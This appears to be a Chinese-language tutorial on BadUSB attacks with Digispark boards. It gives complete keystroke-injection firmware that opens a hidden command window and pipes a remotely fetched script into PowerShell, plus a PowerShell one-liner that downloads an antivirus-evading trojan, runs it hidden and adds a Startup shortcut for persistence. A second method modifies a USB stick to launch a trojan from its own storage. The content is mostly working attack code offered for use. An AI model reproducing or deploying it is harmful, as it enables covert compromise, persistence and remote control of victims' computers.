方案一
思路是通过远程下载一个ps1脚本执行,在下载免杀的木马执行。
先来看badusb的代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| #include "DigiKeyboard.h"
void setup() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.println("curl http://ip/1.txt | powershell");
DigiKeyboard.delay(2000);
DigiKeyboard.println("exit");
}
void loop() {
}
|
再来看powershell脚本
1
| $exePath = Join-Path $env:APPDATA 'badusbhttp.exe'; (New-Object System.Net.WebClient).DownloadFile('http://ip/badusbhttp.txt', $exePath); Start-Process $exePath -WindowStyle Hidden; $startupPath = Join-Path $env:APPDATA 'Microsoft\\Windows\\Start Menu\\Programs\\Startup\\badusbhttp.lnk'; $WshShell = New-Object -ComObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut($startupPath); $Shortcut.TargetPath = $exePath; $Shortcut.Save()
|
这个脚本是去下载恶意木马文件,然后执行上线,看下效果
成功上线
方案二
通过更改硬件的方式上线,这个思路来源参考:
https://mp.weixin.qq.com/s/A2M1QBMnffO1CpjIaXePOA
需要自己更改下电路板使其成为一个正常的usb和一个badusb的结合版,然后在正常的usb中放入免杀木马,在badusb中执行这个木马。
badusb代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| #include "DigiKeyboard.h"
void setup() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.println("D:\木马.exe");
DigiKeyboard.delay(2000);
DigiKeyboard.println("E:\木马.exe");
DigiKeyboard.delay(2000);
DigiKeyboard.println("F:\木马.exe");
DigiKeyboard.println("exit");
}
void loop() {
}
|
这里因为不确定我们的盘符是哪一个所以得多次尝试一下。